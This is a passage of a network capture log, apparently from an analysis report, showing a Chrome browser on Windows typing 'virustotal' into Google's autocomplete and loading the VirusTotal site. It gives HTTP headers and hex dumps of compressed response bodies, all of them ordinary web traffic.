                                                                                                                                                                                                                    X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUX
                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    2024-04-25 19:55:12 UTC1703INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:55:12 GMT
                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                    Expires: -1
                                                                                                                                                                                                                    Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                                                    Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                    Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-243MUo75_9UCS4ZYLRxy4A' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                    Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                    Permissions-Policy: unload=()
                                                                                                                                                                                                                    Origin-Trial: Ap+qNlnLzJDKSmEHjzM5ilaa908GuehlLqGb6ezME5lkhelj20qVzfv06zPmQ3LodoeujZuphAolrnhnPA8w4AIAAABfeyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJQZXJtaXNzaW9uc1BvbGljeVVubG9hZCIsImV4cGlyeSI6MTY4NTY2Mzk5OX0=
                                                                                                                                                                                                                    Origin-Trial: AvudrjMZqL7335p1KLV2lHo1kxdMeIN0dUI15d0CPz9dovVLCcXk8OAqjho1DX4s6NbHbA/AGobuGvcZv0drGgQAAAB9eyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJCYWNrRm9yd2FyZENhY2hlTm90UmVzdG9yZWRSZWFzb25zIiwiZXhwaXJ5IjoxNjkxNTM5MTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0=
                                                                                                                                                                                                                    Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                    Server: gws
                                                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                    Accept-Ranges: none
                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                    2024-04-25 19:55:12 UTC600INData Raw: 32 35 31 0d 0a 29 5d 7d 27 0a 5b 22 76 69 72 75 73 22 2c 5b 22 76 69 72 75 73 22 2c 22 76 69 72 75 73 74 6f 74 61 6c 22 2c 22 76 69 72 75 73 65 73 22 2c 22 76 69 72 75 73 20 73 63 61 6e 22 2c 22 76 69 72 75 73 20 64 65 66 69 6e 69 74 69 6f 6e 22 2c 22 76 69 72 75 73 20 70 72 6f 74 65 63 74 69 6f 6e 22 2c 22 76 69 72 75 73 20 63 68 65 63 6b 65 72 22 2c 22 76 69 72 75 73 20 73 63 61 6e 6e 65 72 22 2c 22 76 69 72 75 73 20 65 78 61 6d 70 6c 65 73 22 2c 22 76 69 72 75 73 20 70 72 6f 74 65 63 74 69 6f 6e 20 66 6f 72 20 63 6f 6d 70 75 74 65 72 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22 67 6f 6f 67 6c 65 3a 63 6c 69 65 6e 74 64 61 74 61 22 3a 7b 22 62 70 63 22 3a 66 61 6c 73 65 2c 22 74
                                                                                                                                                                                                                    Data Ascii: 251)]}'["virus",["virus","virustotal","viruses","virus scan","virus definition","virus protection","virus checker","virus scanner","virus examples","virus protection for computer"],["","","","","","","","","",""],[],{"google:clientdata":{"bpc":false,"t
                                                                                                                                                                                                                    2024-04-25 19:55:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    63192.168.2.164977764.233.185.1054432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:12 UTC652OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=virust&oit=1&cp=6&pgcl=4&gs_rn=42&psi=3aV4RE0JYE4q_43B&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                                                                                                                    Host: www.google.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUX
                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    64192.168.2.164977864.233.185.1054432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:12 UTC653OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=virusto&oit=1&cp=7&pgcl=4&gs_rn=42&psi=3aV4RE0JYE4q_43B&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                                                                                                                    Host: www.google.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUX
                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    65192.168.2.164977964.233.185.1054432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:12 UTC657OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=virustotal&oit=1&cp=10&pgcl=4&gs_rn=42&psi=3aV4RE0JYE4q_43B&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                                                                                                                    Host: www.google.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUX
                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    66192.168.2.164978064.233.185.1054432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:13 UTC658OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=virustotal.&oit=1&cp=11&pgcl=4&gs_rn=42&psi=3aV4RE0JYE4q_43B&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                                                                                                                    Host: www.google.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUX
                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    67192.168.2.164978164.233.185.1054432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:13 UTC659OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=virustotal.c&oit=1&cp=12&pgcl=4&gs_rn=42&psi=3aV4RE0JYE4q_43B&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                                                                                                                    Host: www.google.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUX
                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    68192.168.2.164978264.233.185.1054432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:13 UTC660OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=virustotal.co&oit=3&cp=13&pgcl=4&gs_rn=42&psi=3aV4RE0JYE4q_43B&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                                                                                                                    Host: www.google.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUX
                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    69192.168.2.164978364.233.185.1054432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:13 UTC661OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=virustotal.com&oit=3&cp=14&pgcl=4&gs_rn=42&psi=3aV4RE0JYE4q_43B&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                                                                                                                    Host: www.google.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUX
                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    70192.168.2.1649786216.239.36.214432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:13 UTC657OUTGET / HTTP/1.1
                                                                                                                                                                                                                    Host: virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                    Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                    Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                    Sec-Fetch-User: ?1
                                                                                                                                                                                                                    Sec-Fetch-Dest: document
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    2024-04-25 19:55:14 UTC287INHTTP/1.1 302 Found
                                                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                    Location: https://www.virustotal.com/gui/
                                                                                                                                                                                                                    X-Cloud-Trace-Context: 7417d966b572546d0fa667845be3c066
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:55:14 GMT
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                    Connection: close


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    71192.168.2.164978874.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:14 UTC665OUTGET /gui/ HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                    Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                    Sec-Fetch-User: ?1
                                                                                                                                                                                                                    Sec-Fetch-Dest: document
                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    2024-04-25 19:55:14 UTC334INHTTP/1.1 200 OK
                                                                                                                                                                                                                    X-Cloud-Trace-Context: 85f5042973f4ea5a46b63245c3cb9bb6
                                                                                                                                                                                                                    Content-Encoding: gzip
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:54:51 GMT
                                                                                                                                                                                                                    Expires: Thu, 25 Apr 2024 19:55:51 GMT
                                                                                                                                                                                                                    Cache-Control: public, max-age=60
                                                                                                                                                                                                                    Age: 23
                                                                                                                                                                                                                    ETag: "M_mJ7A"
                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                    2024-04-25 19:55:14 UTC1074INData Raw: 30 30 30 30 30 30 30 31 0d 0a 1f 0d 0a 30 30 30 30 30 30 30 31 0d 0a 8b 0d 0a 30 30 30 30 30 30 30 31 0d 0a 08 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 31 0d 0a 02 0d 0a 63 33 33 0d 0a ff a4 59 0b 77 9b 46 16 fe 2b 84 9e 7a c5 16 10 20 a1 97 2d e7 38 6e da 4d 9b 38 d9 d8 49 da e6 e4 f4 0c 30 48 63 03 c3 32 23 59 8a a2 ff be df 80 24 90 62 bb 4e 9b 1c db 3c ee bd 33 73 1f df 7d 70 f2 24 e2 a1 5c e6 54 9b ca 34 39 3d 51 bf b5 84 64 93 b1 4e 33 1d f7 94 44 a7 27 22 2c 58 2e 4f 9f c4 b3 2c 94 8c 67 2d 6a 4a 93 98 99 39 31 56 f4 63 f6 69 ac 7e 7d f9 f2 f1 93 a9 2e ec 7c 26 a6 ad 95 3e 91
                                                                                                                                                                                                                    Data Ascii: 0000000100000001000000010000000100000001000000010000000100000001000001c33YwF+z -8nM8I0Hc2#Y$bN<3s}p$\T49=QdN3D'",X.O,g-jJ91Vci~}.|&>
                                                                                                                                                                                                                    2024-04-25 19:55:14 UTC1408INData Raw: 7c 10 05 76 c1 b9 7c 43 10 c0 1b 21 35 a0 25 2c bb d1 0a 9a 8c 75 86 65 f4 4d 50 b1 14 de 23 da 31 81 e1 00 65 62 3e 41 84 d5 a4 70 2b 16 43 2d 5b f2 ed 3d 00 18 32 f6 60 47 4e 01 fb 56 c8 93 3d e0 f9 ae 13 fb 6e e0 ef 93 a6 3c 60 09 c0 85 06 16 bc db 82 9d 15 70 34 20 a0 82 90 06 a6 81 2c 61 15 dc 5a 0a e5 1a b4 7b 70 71 c0 42 ad bf b7 d4 57 7c 70 0c 39 13 56 40 80 73 72 b9 b7 d7 00 30 7e 63 49 38 98 48 66 21 a2 68 ff ac 6a e7 5f 89 2b a1 f0 be 33 d4 da af 78 25 9f 85 53 eb 0e a3 6d 8d d1 56 ef ac ee 60 d1 1d d8 79 b6 6f c0 af 45 08 f6 99 8a b1 de f7 16 7d 6f 6b d6 8d 17 ec 0b 2c 29 1e 2f 70 d8 5b 0c 7b 0f 0a 2c 29 1e 2f d0 ed 76 17 f8 79 50 e4 86 e6 1b 84 0e bd 85 3b 7c f8 e0 78 af 68 36 42 1b 2e 95 8a a6 1f 5e c1 87 5f a8 f0 69 18 f2 4e 45 ee 6f f2 41
                                                                                                                                                                                                                    Data Ascii: |v|C!5%,ueMP#1eb>Ap+C-[=2`GNV=n<`p4 ,aZ{pqBW|p9V@sr0~cI8Hf!hj_+3x%SmV`yoE}ok,)/p[{,)/vyP;|xh6B.^_iNEoA
                                                                                                                                                                                                                    2024-04-25 19:55:14 UTC763INData Raw: a5 8f 9c 27 65 dd 2f da 21 46 a8 d6 b5 b0 dd e1 70 00 05 f7 fd 88 b8 7d e2 b8 41 27 0c a8 df a3 9d 20 e8 3a 9e 47 4b b5 67 3c e5 d1 ac 6c 1f b0 85 ad a2 ef 16 5c d0 dd a4 d2 2a 66 c0 c5 94 da 5e 30 ec 0f 21 d4 e9 ba bd 78 d0 a3 41 44 7c 1a 75 a2 2e e9 fb c4 f5 fa 7f b9 c8 e9 1d 53 58 22 a6 f7 8f 67 37 73 92 1f ee e6 b3 c5 2c 10 b2 68 79 c6 2e c4 36 46 bd e2 e2 1c 91 35 a1 d1 2b 2a 04 d2 f9 f8 89 5b 9f 78 67 ce 37 98 15 21 76 68 a6 2a 63 ed 17 32 27 97 e5 40 5e 03 30 29 a3 68 48 0b 42 43 ae 40 2e a6 76 d3 0f 36 ca cb 66 49 f2 e4 fe 51 10 5c 5a 37 6c 8c 82 cf d0 8b cd 01 2e bb 73 1c 0e 8d 0e 28 5b 8d 91 f2 c6 3e d5 24 1e 8d 9f f2 b8 c9 6e fe f6 92 61 7a 56 2c e1 d5 87 e3 f9 1d 89 9d 51 d9 de dd a9 91 2b 0c f5 14 d3 78 64 ab 31 8a 62 cc 6e 98 9a 8b 1c 7a c4
                                                                                                                                                                                                                    Data Ascii: 'e/!Fp}A' :GKg<l\*f^0!xAD|u.SX"g7s,hy.6F5+*[xg7!vh*c2'@^0)hHBC@.v6fIQ\Z7l.s([>$nazV,Q+xd1bnz
                                                                                                                                                                                                                    2024-04-25 19:55:14 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    72192.168.2.164978974.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:14 UTC553OUTGET /gui/main.92c57b63482d090b859f.js HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                    Referer: https://www.virustotal.com/
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    2024-04-25 19:55:15 UTC356INHTTP/1.1 200 OK
                                                                                                                                                                                                                    X-Cloud-Trace-Context: c70f384ac0041aa6854fe6384ba75666
                                                                                                                                                                                                                    Content-Encoding: gzip
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 14:01:00 GMT
                                                                                                                                                                                                                    Expires: Fri, 25 Apr 2025 14:01:00 GMT
                                                                                                                                                                                                                    Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                    ETag: "M_mJ7A"
                                                                                                                                                                                                                    Content-Type: application/javascript
                                                                                                                                                                                                                    Age: 21255
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                    2024-04-25 19:55:15 UTC1052INData Raw: 30 30 30 30 30 30 30 31 0d 0a 1f 0d 0a 30 30 30 30 30 30 30 31 0d 0a 8b 0d 0a 30 30 30 30 30 30 30 31 0d 0a 08 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 02 0d 0a 30 30 30 30 30 30 30 31 0d 0a ff 0d 0a 30 30 30 30 30 30 30 31 0d 0a ec 0d 0a 30 30 30 30 30 30 30 31 0d 0a bd 0d 0a 30 30 30 30 30 30 30 31 0d 0a 6d 0d 0a 30 30 30 30 30 30 30 31 0d 0a 5b 0d 0a 30 30 30 30 30 30 30 31 0d 0a 22 0d 0a 30 30 30 30 30 30 30 31 0d 0a c9 0d 0a 30 30 30 30 30 30 30 31 0d 0a b2 0d 0a 30 30 30 30 30 66 65 66 0d 0a 36 fa 7d ff 0a 9a 3d c7 0b c6 12 01 5f 1b 9b 76 a3 62 37 3d 2a 2e b1 df
                                                                                                                                                                                                                    Data Ascii: 00000001000000010000000100000001000000010000000100000001000000010000000100000001000000010000000100000001m00000001[00000001"000000010000000100000fef6}=_vb7=*.
